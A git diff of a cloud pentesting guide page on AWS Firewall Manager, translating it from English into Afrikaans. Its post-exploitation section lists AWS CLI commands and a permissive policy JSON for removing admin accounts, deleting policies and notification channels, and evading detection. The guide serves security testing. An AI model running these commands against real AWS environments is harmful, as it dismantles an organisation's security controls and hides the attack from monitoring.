@@ -4,80 +4,79 @@ ## Firewall Manager -**AWS Firewall Manager** streamlines the management and maintenance of **AWS WAF, AWS Shield Advanced, Amazon VPC security groups and Network Access Control Lists (ACLs), and AWS Network Firewall, AWS Route 53 Resolver DNS Firewall and third-party firewalls** across multiple accounts and resources. It enables you to configure your firewall rules, Shield Advanced protections, VPC security groups, and Network Firewall settings just once, with the service **automatically enforcing these rules and protections across your accounts and resources**, including newly added ones. +**AWS Firewall Manager** stroomlyn die bestuur en onderhoud van **AWS WAF, AWS Shield Advanced, Amazon VPC-sekuriteitsgroepe en Netwerk Toegang Beheer Lyste (ACLs), en AWS Network Firewall, AWS Route 53 Resolver DNS Firewall en derdeparty-vuurmure** oor verskeie rekeninge en hulpbronne. Dit stel jou in staat om jou vuurmuurreĂ«ls, Shield Advanced beskermings, VPC-sekuriteitsgroepe, en Network Firewall-instellings net een keer te konfigureer, met die diens **wat hierdie reĂ«ls en beskermings outomaties afdwing oor jou rekeninge en hulpbronne**, insluitend nuut bygevoegde. -The service offers the capability to **group and safeguard specific resources together**, like those sharing a common tag or all your CloudFront distributions. A significant advantage of Firewall Manager is its ability to **automatically extend protection to newly added resources** in your account. +Die diens bied die vermoĂ« om **spesifieke hulpbronne saam te groepeer en te beskerm**, soos diĂ© wat 'n gemeenskaplike etiket deel of al jou CloudFront verspreidings. 'n Belangrike voordeel van Firewall Manager is sy vermoĂ« om **outomaties beskerming uit te brei na nuut bygevoegde hulpbronne** in jou rekening. 
-A **rule group** (a collection of WAF rules) can be incorporated into an AWS Firewall Manager Policy, which is then linked to specific AWS resources such as CloudFront distributions or application load balancers. +'n **ReĂ«lgroep** (n versameling van WAF-reĂ«ls) kan in 'n AWS Firewall Manager-beleid ingesluit word, wat dan aan spesifieke AWS-hulpbronne soos CloudFront verspreidings of toepassingslaaibalansers gekoppel word. -AWS Firewall Manager provides **managed application and protocol lists** to simplify the configuration and management of security group policies. These lists allow you to define the protocols and applications permitted or denied by your policies. There are two types of managed lists: +AWS Firewall Manager bied **bestuurde toepassings- en protokollyste** om die konfigurasie en bestuur van sekuriteitsgroepbeleide te vereenvoudig. Hierdie lyste stel jou in staat om die protokolle en toepassings wat deur jou beleide toegelaat of geweier word, te definieer. Daar is twee tipes bestuurde lyste: -- **Firewall Manager managed lists**: These lists include **FMS-Default-Public-Access-Apps-Allowed**, **FMS-Default-Protocols-Allowed** and **FMS-Default-Protocols-Allowed**. They are managed by Firewall Manager and include commonly used applications and protocols that should be allowed or denied to the general public. It is not possible to edit or delete them, however, you can choose its version. -- **Custom managed lists**: You manage these lists yourself. You can create custom application and protocol lists tailored to your organization's needs. Unlike Firewall Manager managed lists, these lists do not have versions, but you have full control over custom lists, allowing you to create, edit, and delete them as required. +- **Firewall Manager bestuurde lyste**: Hierdie lyste sluit **FMS-Default-Public-Access-Apps-Allowed**, **FMS-Default-Protocols-Allowed** en **FMS-Default-Protocols-Allowed** in. 
Hulle word deur Firewall Manager bestuur en sluit algemeen gebruikte toepassings en protokolle in wat aan die algemene publiek toegelaat of geweier moet word. Dit is nie moontlik om hulle te redigeer of te verwyder nie, maar jy kan sy weergawe kies. +- **Pasgemaakte bestuurde lyste**: Jy bestuur hierdie lyste self. Jy kan pasgemaakte toepassings- en protokollyste skep wat op jou organisasie se behoeftes afgestem is. Anders as Firewall Manager bestuurde lyste, het hierdie lyste nie weergawes nie, maar jy het volle beheer oor pasgemaakte lyste, wat jou toelaat om hulle te skep, te redigeer en te verwyder soos benodig. -It's important to note that **Firewall Manager policies permit only "Block" or "Count" actions** for a rule group, without an "Allow" option. +Dit is belangrik om te noem dat **Firewall Manager-beleide slegs "Block" of "Count" aksies** vir 'n reĂ«lgroep toelaat, sonder 'n "Allow" opsie. ### Prerequisites -The following prerequisite steps must be completed before proceeding to configure Firewall Manager to begin protecting your organization's resources effectively. These steps provide the foundational setup required for Firewall Manager to enforce security policies and ensure compliance across your AWS environment: +Die volgende vereiste stappe moet voltooi word voordat jy voortgaan om Firewall Manager te konfigureer om jou organisasie se hulpbronne effektief te beskerm. Hierdie stappe bied die fundamentele opstelling wat benodig word vir Firewall Manager om sekuriteitsbeleide af te dwing en nakoming oor jou AWS-omgewing te verseker: -1. **Join and configure AWS Organizations:** Ensure your AWS account is part of the AWS Organizations organization where the AWS Firewall Manager policies are planned to be implanted. This allows for centralized management of resources and policies across multiple AWS accounts within the organization. -2. 
**Create an AWS Firewall Manager Default Administrator Account:** Establish a default administrator account specifically for managing Firewall Manager security policies. This account will be responsible for configuring and enforcing security policies across the organization. Just the management account of the organization is able to create Firewall Manager default administrator accounts. -3. **Enable AWS Config:** Activate AWS Config to provide Firewall Manager with the necessary configuration data and insights required to effectively enforce security policies. AWS Config helps analyze, audit, monitor and audit resource configurations and changes, facilitating better security management. -4. **For Third-Party Policies, Subscribe in the AWS Marketplace and Configure Third-Party Settings:** If you plan to utilize third-party firewall policies, subscribe to them in the AWS Marketplace and configure the necessary settings. This step ensures that Firewall Manager can integrate and enforce policies from trusted third-party vendors. -5. **For Network Firewall and DNS Firewall Policies, enable resource sharing:** Enable resource sharing specifically for Network Firewall and DNS Firewall policies. This allows Firewall Manager to apply firewall protections to your organization's VPCs and DNS resolution, enhancing network security. -6. **To use AWS Firewall Manager in Regions that are disabled by default:** If you intend to use Firewall Manager in AWS regions that are disabled by default, ensure that you take the necessary steps to enable its functionality in those regions. This ensures consistent security enforcement across all regions where your organization operates. +1. **Sluit aan en konfigureer AWS Organizations:** Verseker dat jou AWS-rekening deel is van die AWS Organizations-organisasie waar die AWS Firewall Manager-beleide beplan word om geĂŻmplementeer te word. 
Dit stel sentrale bestuur van hulpbronne en beleide oor verskeie AWS-rekeninge binne die organisasie moontlik. +2. **Skep 'n AWS Firewall Manager Default Administrator Account:** Stel 'n standaard administrateurrekening in spesifiek vir die bestuur van Firewall Manager-sekuriteitsbeleide. Hierdie rekening sal verantwoordelik wees vir die konfigurasie en afdwinging van sekuriteitsbeleide oor die organisasie. Slegs die bestuurrekening van die organisasie kan Firewall Manager standaard administrateurrekeninge skep. +3. **Aktiveer AWS Config:** Aktiveer AWS Config om Firewall Manager van die nodige konfigurasiedata en insigte te voorsien wat benodig word om sekuriteitsbeleide effektief af te dwing. AWS Config help om hulpbron konfigurasies en veranderinge te analiseer, te oudit, te monitor en te oudit, wat beter sekuriteitsbestuur fasiliteer. +4. **Vir Derdeparty-beleide, inteken in die AWS Marketplace en konfigureer Derdeparty-instellings:** As jy van plan is om derdeparty-vuurmuurbeleide te gebruik, teken in op hulle in die AWS Marketplace en konfigureer die nodige instellings. Hierdie stap verseker dat Firewall Manager kan integreer en beleide van vertroude derdeparty-verskaffers kan afdwing. +5. **Vir Netwerk Vuurmuur en DNS Vuurmuur Beleide, aktiveer hulpbrondeling:** Aktiveer hulpbrondeling spesifiek vir Netwerk Vuurmuur en DNS Vuurmuur beleide. Dit stel Firewall Manager in staat om vuurmuurbeskerming toe te pas op jou organisasie se VPCs en DNS-resolusie, wat netwerk sekuriteit verbeter. +6. **Om AWS Firewall Manager in streke te gebruik wat standaard gedeaktiveer is:** As jy van plan is om Firewall Manager in AWS-streke te gebruik wat standaard gedeaktiveer is, verseker dat jy die nodige stappe neem om sy funksionaliteit in daardie streke te aktiveer. Dit verseker konsekwente sekuriteitsafdwinging oor alle streke waar jou organisasie opereer. 
-For more information, check: [Getting started with AWS Firewall Manager AWS WAF policies](https://docs.aws.amazon.com/waf/latest/developerguide/getting-started-fms.html). +Vir meer inligting, kyk: [Getting started with AWS Firewall Manager AWS WAF policies](https://docs.aws.amazon.com/waf/latest/developerguide/getting-started-fms.html). ### Types of protection policies -AWS Firewall Manager manages several types of policies to enforce security controls across different aspects of your organization's infrastructure: +AWS Firewall Manager bestuur verskeie tipes beleide om sekuriteitsbeheer oor verskillende aspekte van jou organisasie se infrastruktuur af te dwing: -1. **AWS WAF Policy:** This policy type supports both AWS WAF and AWS WAF Classic. You can define which resources are protected by the policy. For AWS WAF policies, you can specify sets of rule groups to run first and last in the web ACL. Additionally, account owners can add rules and rule groups to run in between these sets. -2. **Shield Advanced Policy:** This policy applies Shield Advanced protections across your organization for specified resource types. It helps safeguard against DDoS attacks and other threats. -3. **Amazon VPC Security Group Policy:** With this policy, you can manage security groups used throughout your organization, enforcing a baseline set of rules across your AWS environment to control network access. -4. **Amazon VPC Network Access Control List (ACL) Policy:** This policy type gives you control over network ACLs used in your organization, allowing you to enforce a baseline set of network ACLs across your AWS environment. -5. **Network Firewall Policy:** This policy applies AWS Network Firewall protection to your organization's VPCs, enhancing network security by filtering traffic based on predefined rules. -6. 
**Amazon Route 53 Resolver DNS Firewall Policy:** This policy applies DNS Firewall protections to your organization's VPCs, helping to block malicious domain resolution attempts and enforce security policies for DNS traffic. -7. **Third-Party Firewall Policy:** This policy type applies protections from third-party firewalls, which are available by subscription through the AWS Marketplace console. It allows you to integrate additional security measures from trusted vendors into your AWS environment. - 1. **Palo Alto Networks Cloud NGFW Policy:** This policy applies Palo Alto Networks Cloud Next Generation Firewall (NGFW) protections and rulestacks to your organization's VPCs, providing advanced threat prevention and application-level security controls. - 2. **Fortigate Cloud Native Firewall (CNF) as a Service Policy:** This policy applies Fortigate Cloud Native Firewall (CNF) as a Service protections, offering industry-leading threat prevention, web application firewall (WAF), and API protection tailored for cloud infrastructures. +1. **AWS WAF Policy:** Hierdie beleids tipe ondersteun beide AWS WAF en AWS WAF Classic. Jy kan definieer watter hulpbronne deur die beleid beskerm word. Vir AWS WAF-beleide kan jy stelle reĂ«lgroepe spesifiseer om eerste en laaste in die web ACL te loop. Boonop kan rekening eienaars reĂ«ls en reĂ«lgroepe byvoeg om tussen hierdie stelle te loop. +2. **Shield Advanced Policy:** Hierdie beleid pas Shield Advanced beskermings oor jou organisasie toe vir gespesifiseerde hulpbron tipes. Dit help om teen DDoS-aanvalle en ander bedreigings te beskerm. +3. **Amazon VPC Security Group Policy:** Met hierdie beleid kan jy sekuriteitsgroepe bestuur wat deur jou organisasie gebruik word, en 'n basiese stel reĂ«ls oor jou AWS-omgewing afdwing om netwerktoegang te beheer. +4. 
**Amazon VPC Network Access Control List (ACL) Policy:** Hierdie beleids tipe gee jou beheer oor netwerk ACLs wat in jou organisasie gebruik word, wat jou toelaat om 'n basiese stel netwerk ACLs oor jou AWS-omgewing af te dwing. +5. **Network Firewall Policy:** Hierdie beleid pas AWS Network Firewall beskerming toe op jou organisasie se VPCs, wat netwerk sekuriteit verbeter deur verkeer te filter op grond van vooraf gedefinieerde reĂ«ls. +6. **Amazon Route 53 Resolver DNS Firewall Policy:** Hierdie beleid pas DNS Firewall beskermings toe op jou organisasie se VPCs, wat help om kwaadwillige domeinresolusie pogings te blokkeer en sekuriteitsbeleide vir DNS-verkeer af te dwing. +7. **Third-Party Firewall Policy:** Hierdie beleids tipe pas beskermings van derdeparty-vuurmure toe, wat deur intekening beskikbaar is deur die AWS Marketplace-konsol. Dit stel jou in staat om bykomende sekuriteitsmaatreĂ«ls van vertroude verskaffers in jou AWS-omgewing te integreer. +1. **Palo Alto Networks Cloud NGFW Policy:** Hierdie beleid pas Palo Alto Networks Cloud Next Generation Firewall (NGFW) beskermings en reĂ«lstapels toe op jou organisasie se VPCs, wat gevorderde bedreigingsvoorkoming en toepassingsvlak sekuriteitsbeheer bied. +2. **Fortigate Cloud Native Firewall (CNF) as a Service Policy:** Hierdie beleid pas Fortigate Cloud Native Firewall (CNF) as 'n diens beskermings toe, wat toonaangewende bedreigingsvoorkoming, webtoepassing vuurmuur (WAF), en API-beskerming bied wat op wolkinfrastrukture afgestem is. ### Administrator accounts -AWS Firewall Manager offers flexibility in managing firewall resources within your organization through its administrative scope and two types of administrator accounts. +AWS Firewall Manager bied buigsaamheid in die bestuur van vuurmuurhulpbronne binne jou organisasie deur sy administratiewe omvang en twee tipes administrateurrekeninge. -**Administrative scope defines the resources that a Firewall Manager administrator can manage**. 
After an AWS Organizations management account onboards an organization to Firewall Manager, it can create additional administrators with different administrative scopes. These scopes can include: +**Administratiewe omvang definieer die hulpbronne wat 'n Firewall Manager administrateur kan bestuur**. Nadat 'n AWS Organizations bestuurrekening 'n organisasie by Firewall Manager aanmeld, kan dit addisionele administrateurs met verskillende administratiewe omfange skep. Hierdie omfange kan insluit: -- Accounts or organizational units (OUs) that the administrator can apply policies to. -- Regions where the administrator can perform actions. -- Firewall Manager policy types that the administrator can manage. +- Rekeninge of organisatoriese eenhede (OUs) waaraan die administrateur beleide kan toepas. +- Streke waar die administrateur aksies kan uitvoer. +- Firewall Manager beleids tipes wat die administrateur kan bestuur. -Administrative scope can be either **full or restricted**. Full scope grants the administrator access to **all specified resource types, regions, and policy types**. In contrast, **restricted scope provides administrative permission to only a subset of resources, regions, or policy types**. It's advisable to grant administrators only the permissions they need to fulfill their roles effectively. You can apply any combination of these administrative scope conditions to an administrator, ensuring adherence to the principle of least privilege. +Administratiewe omvang kan ofwel **volledig of beperk** wees. Volledige omvang gee die administrateur toegang tot **alle gespesifiseerde hulpbron tipes, streke, en beleids tipes**. In teenstelling hiermee, **beperkte omvang bied administratiewe toestemming slegs aan 'n subgroep van hulpbronne, streke, of beleids tipes**. Dit is raadsaam om administrateurs slegs die toestemming te gee wat hulle nodig het om hul rolle effektief te vervul. 
Jy kan enige kombinasie van hierdie administratiewe omvang toestande op 'n administrateur toepas, wat nakoming van die beginsel van minste voorreg verseker. -There are two distinct types of administrator accounts, each serving specific roles and responsibilities: +Daar is twee duidelike tipes administrateurrekeninge, elk met spesifieke rolle en verantwoordelikhede: - **Default Administrator:** - - The default administrator account is created by the AWS Organizations organization's management account during the onboarding process to Firewall Manager. - - This account has the capability to manage third-party firewalls and possesses full administrative scope. - - It serves as the primary administrator account for Firewall Manager, responsible for configuring and enforcing security policies across the organization. - - While the default administrator has full access to all resource types and administrative functionalities, it operates at the same peer level as other administrators if multiple administrators are utilized within the organization. +- Die standaard administrateurrekening word deur die AWS Organizations-organisasie se bestuurrekening tydens die aanmeldproses by Firewall Manager geskep. +- Hierdie rekening het die vermoĂ« om derdeparty-vuurmure te bestuur en het volle administratiewe omvang. +- Dit dien as die primĂȘre administrateurrekening vir Firewall Manager, verantwoordelik vir die konfigurasie en afdwinging van sekuriteitsbeleide oor die organisasie. +- Terwyl die standaard administrateur volle toegang tot alle hulpbron tipes en administratiewe funksies het, werk dit op dieselfde gelyke vlak as ander administrateurs as verskeie administrateurs binne die organisasie gebruik word. - **Firewall Manager Administrators:** - - These administrators can manage resources within the scope designated by the AWS Organizations management account, as defined by the administrative scope configuration. 
- - Firewall Manager administrators are created to fulfill specific roles within the organization, allowing for delegation of responsibilities while maintaining security and compliance standards. - - Upon creation, Firewall Manager checks with AWS Organizations to determine if the account is already a delegated administrator. If not, Firewall Manager calls Organizations to designate the account as a delegated administrator for Firewall Manager. +- Hierdie administrateurs kan hulpbronne bestuur binne die omvang wat deur die AWS Organizations bestuurrekening aangewys is, soos gedefinieer deur die administratiewe omvang konfigurasie. +- Firewall Manager administrateurs word geskep om spesifieke rolle binne die organisasie te vervul, wat die delegasie van verantwoordelikhede moontlik maak terwyl sekuriteit en nakomingstandaarde gehandhaaf word. +- By die skepping, kontroleer Firewall Manager met AWS Organizations om te bepaal of die rekening reeds 'n gedelegeerde administrateur is. As nie, bel Firewall Manager Organisasies om die rekening as 'n gedelegeerde administrateur vir Firewall Manager aan te dui. -Managing these administrator accounts involves creating them within Firewall Manager and defining their administrative scopes according to the organization's security requirements and the principle of least privilege. By assigning appropriate administrative roles, organizations can ensure effective security management while maintaining granular control over access to sensitive resources. +Die bestuur van hierdie administrateurrekeninge behels die skepping daarvan binne Firewall Manager en die definisie van hul administratiewe omfange volgens die organisasie se sekuriteitsvereistes en die beginsel van minste voorreg. Deur toepaslike administratiewe rolle toe te ken, kan organisasies effektiewe sekuriteitsbestuur verseker terwyl hulle fyn beheer oor toegang tot sensitiewe hulpbronne handhaaf. 
-It is important to highlight that **only one account within an organization can serve as the Firewall Manager default administrator**, adhering to the principle of "**first in, last out**". To designate a new default administrator, a series of steps must be followed: +Dit is belangrik om te beklemtoon dat **slegs een rekening binne 'n organisasie as die Firewall Manager standaard administrateur kan dien**, wat die beginsel van "**eerste in, laaste uit**" volg. Om 'n nuwe standaard administrateur aan te dui, moet 'n reeks stappe gevolg word: -- First, each Firewall Administrator administrator account must revoke their own account. -- Then, the existing default administrator can revoke their own account, effectively offboarding the organization from Firewall Manager. This process results in the deletion of all Firewall Manager policies created by the revoked account. -- To conclude, the AWS Organizations management account must designate the Firewall Manager dafault administrator. +- Eerstens, elke Firewall Administrator administrateurrekening moet hul eie rekening herroep. +- Dan kan die bestaande standaard administrateur hul eie rekening herroep, wat effektief die organisasie van Firewall Manager afmeld. Hierdie proses lei tot die verwydering van alle Firewall Manager-beleide wat deur die herroepte rekening geskep is. +- Om af te sluit, moet die AWS Organizations bestuurrekening die Firewall Manager standaard administrateur aanwys. ## Enumeration - ``` # Users/Administrators 
@@ -162,66 +161,58 @@ aws fms get-third-party-firewall-association-status --third-party-firewall --member-account --resource-id --resource-type ``` - ## Post Exploitation / Bypass Detection ### `organizations:DescribeOrganization` & (`fms:AssociateAdminAccount`, `fms:DisassociateAdminAccount`, `fms:PutAdminAccount`) -An attacker with the **`fms:AssociateAdminAccount`** permission would be able to set the Firewall Manager default administrator account. With the **`fms:PutAdminAccount`** permission, an attacker would be able to create or updatea Firewall Manager administrator account and with the **`fms:DisassociateAdminAccount`** permission, a potential attacker could remove the current Firewall Manager administrator account association. - -- The disassociation of the **Firewall Manager default administrator follows the first-in-last-out policy**. All the Firewall Manager administrators must disassociate before the Firewall Manager default administrator can disassociate the account. -- In order to create a Firewall Manager administrator by **PutAdminAccount**, the account must belong to the organization that was previously onboarded to Firewall Manager using **AssociateAdminAccount**. -- The creation of a Firewall Manager administrator account can only be done by the organization's management account. +'n Aanvaller met die **`fms:AssociateAdminAccount`** toestemming sal in staat wees om die Firewall Manager standaard administrateur rekening in te stel. Met die **`fms:PutAdminAccount`** toestemming, sal 'n aanvaller in staat wees om 'n Firewall Manager administrateur rekening te skep of op te dateer en met die **`fms:DisassociateAdminAccount`** toestemming, kan 'n potensiĂ«le aanvaller die huidige Firewall Manager administrateur rekening assosiasie verwyder. +- Die disassosiasie van die **Firewall Manager standaard administrateur volg die eerste-in-laatste-uit beleid**. 
Alle Firewall Manager administrateurs moet disassosieer voordat die Firewall Manager standaard administrateur die rekening kan disassosieer. +- Ten einde 'n Firewall Manager administrateur te skep deur **PutAdminAccount**, moet die rekening aan die organisasie behoort wat voorheen by Firewall Manager geregistreer is met behulp van **AssociateAdminAccount**. +- Die skepping van 'n Firewall Manager administrateur rekening kan slegs deur die organisasie se bestuursrekening gedoen word. ```bash aws fms associate-admin-account --admin-account aws fms disassociate-admin-account aws fms put-admin-account --admin-account ``` - -**Potential Impact:** Loss of centralized management, policy evasion, compliance violations, and disruption of security controls within the environment. +**PotensiĂ«le Impak:** Verlies van gesentraliseerde bestuur, beleidsontduiking, nakomingsoortredings, en ontwrigting van sekuriteitsbeheer binne die omgewing. ### `fms:PutPolicy`, `fms:DeletePolicy` -An attacker with the **`fms:PutPolicy`**, **`fms:DeletePolicy`** permissions would be able to create, modify or permanently delete an AWS Firewall Manager policy. - +'n Aanvaller met die **`fms:PutPolicy`**, **`fms:DeletePolicy`** toestemmings sal in staat wees om 'n AWS Firewall Manager-beleid te skep, te wysig of permanent te verwyder. 
```bash aws fms put-policy --policy | --cli-input-json file:// [--tag-list ] aws fms delete-policy --policy-id [--delete-all-policy-resources | --no-delete-all-policy-resources] ``` - -An example of permisive policy through permisive security group, in order to bypass the detection, could be the following one: - +'n Voorbeeld van 'n toelaatbare beleid deur 'n toelaatbare sekuriteitsgroep, ten einde die opsporing te omseil, kan die volgende wees: ```json { - "Policy": { - "PolicyName": "permisive_policy", - "SecurityServicePolicyData": { - "Type": "SECURITY_GROUPS_COMMON", - "ManagedServiceData": "{\"type\":\"SECURITY_GROUPS_COMMON\",\"securityGroups\":[{\"id\":\"\"}], \"applyToAllEC2InstanceENIs\":\"true\",\"IncludeSharedVPC\":\"true\"}" - }, - "ResourceTypeList": [ - "AWS::EC2::Instance", - "AWS::EC2::NetworkInterface", - "AWS::EC2::SecurityGroup", - "AWS::ElasticLoadBalancingV2::LoadBalancer", - "AWS::ElasticLoadBalancing::LoadBalancer" - ], - "ResourceType": "AWS::EC2::SecurityGroup", - "ExcludeResourceTags": false, - "ResourceTags": [], - "RemediationEnabled": true - }, - "TagList": [] +"Policy": { +"PolicyName": "permisive_policy", +"SecurityServicePolicyData": { +"Type": "SECURITY_GROUPS_COMMON", +"ManagedServiceData": "{\"type\":\"SECURITY_GROUPS_COMMON\",\"securityGroups\":[{\"id\":\"\"}], \"applyToAllEC2InstanceENIs\":\"true\",\"IncludeSharedVPC\":\"true\"}" +}, +"ResourceTypeList": [ +"AWS::EC2::Instance", +"AWS::EC2::NetworkInterface", +"AWS::EC2::SecurityGroup", +"AWS::ElasticLoadBalancingV2::LoadBalancer", +"AWS::ElasticLoadBalancing::LoadBalancer" +], +"ResourceType": "AWS::EC2::SecurityGroup", +"ExcludeResourceTags": false, +"ResourceTags": [], +"RemediationEnabled": true +}, +"TagList": [] } ``` - -**Potential Impact:** Dismantling of security controls, policy evasion, compliance violations, operational disruptions, and potential data breaches within the environment. 
+**PotensiĂ«le Impak:** Ontmanteling van sekuriteitsbeheer, beleidsontduiking, nakomingsoortredings, operasionele onderbrekings, en potensiĂ«le datalekke binne die omgewing. ### `fms:BatchAssociateResource`, `fms:BatchDisassociateResource`, `fms:PutResourceSet`, `fms:DeleteResourceSet` -An attacker with the **`fms:BatchAssociateResource`** and **`fms:BatchDisassociateResource`** permissions would be able to associate or disassociate resources from a Firewall Manager resource set respectively. In addition, the **`fms:PutResourceSet`** and **`fms:DeleteResourceSet`** permissions would allow an attacker to create, modify or delete these resource sets from AWS Firewall Manager. - +'n Aanvaller met die **`fms:BatchAssociateResource`** en **`fms:BatchDisassociateResource`** toestemmings sal in staat wees om hulpbronne van 'n Firewall Manager hulpbronstel te assosieer of te disassosieer. Daarbenewens sal die **`fms:PutResourceSet`** en **`fms:DeleteResourceSet`** toestemmings 'n aanvaller in staat stel om hierdie hulpbronstelle van AWS Firewall Manager te skep, te wysig of te verwyder. ```bash # Associate/Disassociate resources from a resource set aws fms batch-associate-resource --resource-set-identifier --items 
@@ -231,83 +222,68 @@ aws fms batch-disassociate-resource --resource-set-identifier --items [--tag-list ] aws fms delete-resource-set --identifier ``` - -**Potential Impact:** The addition of an unnecessary amount of items to a resource set will increase the level of noise in the Service potentially causing a DoS. In addition, changes of the resource sets could lead to a resource disruption, policy evasion, compliance violations, and disruption of security controls within the environment. +**PotensiĂ«le Impak:** Die toevoeging van 'n onnodige hoeveelheid items aan 'n hulpbronstel sal die vlak van geraas in die Diens verhoog, wat moontlik 'n DoS kan veroorsaak. Daarbenewens kan veranderinge aan die hulpbronstelle lei tot 'n hulpbrononderbreking, beleidsontduiking, nakomingsoortredings, en onderbreking van sekuriteitsbeheer binne die omgewing. ### `fms:PutAppsList`, `fms:DeleteAppsList` -An attacker with the **`fms:PutAppsList`** and **`fms:DeleteAppsList`** permissions would be able to create, modify or delete application lists from AWS Firewall Manager. This could be critical, as unauthorized applications could be allowed access to the general public, or access to authorized applications could be denied, causing a DoS. - +'n Aanvaller met die **`fms:PutAppsList`** en **`fms:DeleteAppsList`** toestemmings sal in staat wees om toepassingslyste van AWS Firewall Manager te skep, te wysig of te verwyder. Dit kan krities wees, aangesien nie-geautoriseerde toepassings toegang tot die algemene publiek mag kry, of toegang tot geautoriseerde toepassings mag ontken word, wat 'n DoS kan veroorsaak. ```bash aws fms put-apps-list --apps-list [--tag-list ] aws fms delete-apps-list --list-id ``` - -**Potential Impact:** This could result in misconfigurations, policy evasion, compliance violations, and disruption of security controls within the environment. 
+**PotensiĂ«le Impak:** Dit kan lei tot verkeerde konfigurasies, beleidsontduiking, nakomingsoortredings, en onderbreking van sekuriteitsbeheer binne die omgewing. ### `fms:PutProtocolsList`, `fms:DeleteProtocolsList` -An attacker with the **`fms:PutProtocolsList`** and **`fms:DeleteProtocolsList`** permissions would be able to create, modify or delete protocols lists from AWS Firewall Manager. Similarly as with applications lists, this could be critical since unauthorized protocols could be used by the general public, or the use of authorized protocols could be denied, causing a DoS. - +'n Aanvaller met die **`fms:PutProtocolsList`** en **`fms:DeleteProtocolsList`** toestemmings sal in staat wees om protokollys te skep, te wysig of te verwyder vanaf AWS Firewall Manager. Net soos met toepassingslyste, kan dit krities wees aangesien ongeoorloofde protokolle deur die algemene publiek gebruik kan word, of die gebruik van geoorloofde protokolle kan ontken word, wat 'n DoS kan veroorsaak. ```bash aws fms put-protocols-list --apps-list [--tag-list ] aws fms delete-protocols-list --list-id ``` - -**Potential Impact:** This could result in misconfigurations, policy evasion, compliance violations, and disruption of security controls within the environment. +**PotensiĂ«le Impak:** Dit kan lei tot verkeerde konfigurasies, beleidsontduiking, nakomingsoortredings, en onderbreking van sekuriteitsbeheer binne die omgewing. ### `fms:PutNotificationChannel`, `fms:DeleteNotificationChannel` -An attacker with the **`fms:PutNotificationChannel`** and **`fms:DeleteNotificationChannel`** permissions would be able to delete and designate the IAM role and Amazon Simple Notification Service (SNS) topic that Firewall Manager uses to record SNS logs. 
+'n Aanvaller met die **`fms:PutNotificationChannel`** en **`fms:DeleteNotificationChannel`** toestemmings sal in staat wees om die IAM-rol en Amazon Simple Notification Service (SNS) onderwerp wat Firewall Manager gebruik om SNS-logs te registreer, te verwyder en aan te dui. -To use **`fms:PutNotificationChannel`** outside of the console, you need to set up the SNS topic's access policy, allowing the specified **SnsRoleName** to publish SNS logs. If the provided **SnsRoleName** is a role other than the **`AWSServiceRoleForFMS`**, it requires a trust relationship configured to permit the Firewall Manager service principal **fms.amazonaws.com** to assume this role. +Om **`fms:PutNotificationChannel`** buite die konsole te gebruik, moet jy die SNS-onderwerp se toegangbeleid opstel, wat die gespesifiseerde **SnsRoleName** toelaat om SNS-logs te publiseer. As die verskafde **SnsRoleName** 'n rol anders as die **`AWSServiceRoleForFMS`** is, vereis dit 'n vertrouensverhouding wat geconfigureer is om die Firewall Manager dienshoof **fms.amazonaws.com** toe te laat om hierdie rol aan te neem. -For information about configuring an SNS access policy: +Vir inligting oor die konfigurasie van 'n SNS-toegangbeleid: {{#ref}} ../aws-sns-enum.md {{#endref}} - ```bash aws fms put-notification-channel --sns-topic-arn --sns-role-name aws fms delete-notification-channel ``` - -**Potential Impact:** This would potentially lead to miss security alerts, delayed incident response, potential data breaches and operational disruptions within the environment. +**PotensiĂ«le Impak:** Dit kan potensieel lei tot gemiste sekuriteitswaarskuwings, vertraagde insidentrespons, potensiĂ«le datalekke en operasionele ontwrigtings binne die omgewing. 
### `fms:AssociateThirdPartyFirewall`, `fms:DisssociateThirdPartyFirewall` -An attacker with the **`fms:AssociateThirdPartyFirewall`**, **`fms:DisssociateThirdPartyFirewall`** permissions would be able to associate or disassociate third-party firewalls from being managed centrally through AWS Firewall Manager. +'n Aanvaller met die **`fms:AssociateThirdPartyFirewall`**, **`fms:DisssociateThirdPartyFirewall`** toestemmings sal in staat wees om derdeparty-vuurmure te assosieer of te dissosieer van sentrale bestuur deur AWS Firewall Manager. > [!WARNING] -> Only the default administrator can create and manage third-party firewalls. - +> Slegs die standaard administrateur kan derdeparty-vuurmure skep en bestuur. ```bash aws fms associate-third-party-firewall --third-party-firewall [PALO_ALTO_NETWORKS_CLOUD_NGFW | FORTIGATE_CLOUD_NATIVE_FIREWALL] aws fms disassociate-third-party-firewall --third-party-firewall [PALO_ALTO_NETWORKS_CLOUD_NGFW | FORTIGATE_CLOUD_NATIVE_FIREWALL] ``` - -**Potential Impact:** The disassociation would lead to a policy evasion, compliance violations, and disruption of security controls within the environment. The association on the other hand would lead to a disruption of cost and budget allocation. +**PotensiĂ«le Impak:** Die dissosiasie sou lei tot 'n beleidsontduiking, nakomingsoortredings, en ontwrigting van sekuriteitsbeheer binne die omgewing. Die assosiasie aan die ander kant sou lei tot 'n ontwrigting van koste- en begrotingstoewysing. ### `fms:TagResource`, `fms:UntagResource` -An attacker would be able to add, modify, or remove tags from Firewall Manager resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags. - +'n Aanvaller sou in staat wees om etikette by Firewall Manager hulpbronne te voeg, te wysig of te verwyder, wat jou organisasie se koste-toewysing, hulpbronopsporing, en toegangbeheerbeleide gebaseer op etikette ontwrig. 
```bash aws fms tag-resource --resource-arn --tag-list aws fms untag-resource --resource-arn --tag-keys ``` +**PotensiĂ«le Impak**: Ontwrichting van koste-toewysing, hulpbronopsporing, en etiket-gebaseerde toegangbeheerbeleide. -**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies. - -## References +## Verwysings - [https://docs.aws.amazon.com/govcloud-us/latest/UserGuide/govcloud-fms.html](https://docs.aws.amazon.com/govcloud-us/latest/UserGuide/govcloud-fms.html) - [https://docs.aws.amazon.com/service-authorization/latest/reference/list_awsfirewallmanager.html](https://docs.aws.amazon.com/service-authorization/latest/reference/list_awsfirewallmanager.html) - [https://docs.aws.amazon.com/waf/latest/developerguide/fms-chapter.html](https://docs.aws.amazon.com/waf/latest/developerguide/fms-chapter.html) {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.md index 2794852d3..c06141262 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.md +++ 